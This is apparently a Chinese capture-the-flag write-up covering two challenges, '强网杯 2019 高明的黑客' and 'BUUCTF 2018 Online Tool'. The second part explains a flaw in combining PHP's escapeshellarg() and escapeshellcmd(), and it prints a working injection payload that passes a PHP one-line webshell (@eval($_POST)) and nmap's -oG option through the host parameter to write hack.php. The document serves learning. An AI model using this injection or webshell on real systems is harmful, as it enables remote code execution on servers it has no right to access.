[强网杯 2019]高明的黑客
作者直接告诉我们源码备份在www.tar.gz,这样就不用扫网站目录了,省了不少时间。
靠当我没有说,这里面几千个文件,怪不得43M。那人工代码审计是不可能的了,只能靠跑脚本。这里观摩了一下网上大神写的脚本:
https://blog.csdn.net/a3320315/article/details/102945940
主要是看一下脚本的思路,等以后有能力了再做一遍。
[BUUCTF 2018]Online Tool
这里的知识点是escapeshellarg()和escapeshellcmd() 两个函数
https://paper.seebug.org/164/
这篇文章讲的很详细了我就不复述了
利用这个漏洞的地方就在下面的system(“namp…”)里,system函数在命令行里执行nmap命令。nmap是一个扫描工具,可以添加参数-oG实现将命令和结果写到文件。
那么payload就是这个一句话木马
?host=' <?php @eval($_POST["hack"]);?> -oG hack.php '
经过两个函数的转义host='\\' \<\?php @eval($_POST["hack"])\;\?\> -oG hack.php \\''
中间的'\'
可以不看,主要是两边的'\\'
和\\''
。前面的\\
被解释成\
而不是转义字符,所以我们得以将中间的一句话木马和nmap的结果一起写到hack.php文件中
好心的作者还返回了文件名让我们用蚁剑连接,得到flag
http://98cff786-c429-4d23-a6c1-8268bb9a020b.node3.buuoj.cn/03f35087304b172a9af23833864e6797/hack.php
在hack.php里可以看到我们写入的一句话木马和nmap扫描的结果
不过这个漏洞好像已经被修复了,我用php8.0重写代码//
被^
代替了